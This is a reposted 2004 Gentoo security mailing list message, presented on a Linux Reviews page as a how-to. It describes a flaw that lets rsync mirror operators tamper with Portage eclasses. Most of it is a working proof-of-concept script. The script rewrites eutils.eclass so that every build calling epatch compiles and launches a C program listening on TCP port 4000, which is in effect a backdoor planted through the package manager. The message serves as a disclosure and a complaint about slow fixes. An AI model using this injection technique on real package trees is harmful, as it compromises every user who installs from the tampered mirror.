--get your your Linux knowledge
> Linux Reviews > Gentoo Linux >

HOWTO Infect Gentoo Linux Systems with a Trojan Horse

Gentoo Linux uses a package management system called portage. Portage uses something called eclasses to help ebuild authors write advanced builds using out of the box functions. A flaw in this systems allows rsync mirror administrators to place special eclasses who installs Trojan code bombs in the portage tree.

Alexander Holler <at> wrote this to the Gentoo Security mailing list on November 6th 2004:

  after 1.5 years (2 years after the bug could could found in bugzilla) it 
  seems that one of the highest security risks is closed. At least I've 
  seen something about signed ebuilds. (see ).
  Time for the next part. I've already written a bug for that a year ago, 
  but it was now closed a second time by "the ... gatekeeper".
  See bug #26110
  Here's the next small script. If you are operating a gentoo mirror, or 
  having access to one, feel free to play with it.
  If you are a user, the only practical way to ensure a minimum of 
  security is to sync twice:
   (a) sync,
   (b) delete timestap,
   (c) sync with other mirror and
   (d) look if no files where different, otherwise restart with (a)
  if [ ${#} -ne 1 ] ; then
    echo "This script puts a silly trojan into Gentoo's portage."
    echo "Usage: `basename ${0}` PathToPortage"
    exit 1
  mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass
  sed -e 's:^epatch().*{:epatch()  {\newarn "Starting Trojan.\nTry it with 
  telnet localhost 4000.\nKill it with killall 
  GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' 
  <${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass
  cat >${1}/eclass/GentooTrojan.c << EOF
  #include <unistd.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  #include <string.h>
  int main(void)
          struct  sockaddr_in     serv;
          struct  sockaddr_in     cli;
          int     sock;
          sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
          if (sock < 0)
                  return 1;
          bzero((char *) &serv, sizeof(serv));
          serv.sin_family = AF_INET;
          serv.sin_addr.s_addr = htonl(INADDR_ANY);
          serv.sin_port = htons(4000);
          if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
                  return 1;
          if (listen(sock, 5) < 0)
                  return 1;
          while (1) {
                  int     scli;
                  int     slen;
      static char *str="Your are listing to the famous Gentoo trojan!\n";
                  slen = sizeof(cli);
                  scli = accept(sock, (struct sockaddr *) &cli, 
  (socklen_t *) &slen);
      write(scli, str, strlen(str));
  gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c
  echo "Done. Portage successful infected with a trojan."
  echo "Just emerge an ebuild which uses epatch and do a"
  echo "  telnet localhost 4000"
  echo "afterwards."
  Kind regards,
  Alexander Holler
  PS: Please don't reply to me, I don't read any Gentoo mailing lists 
  anymore, in fact I even don't know why I'm writting this message, as I 
  already have lost every interest in Gentoo some time ago.
  PPS: Sorry for that hard words, but that all reminds me on Microsoft. 
  The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting 
  forgotten, ignored or fixed in the same time.
  PPPS: I really appreciate all the very good work on hardened gcc, 
  selinux-profiles and so on, but for me, this all seems useless as long 
  as the base is compromised that easy and the user has no practical way 
  (e.g. hashs) to check what he gets on his machine with a 'sync'.

See also:

Meet new people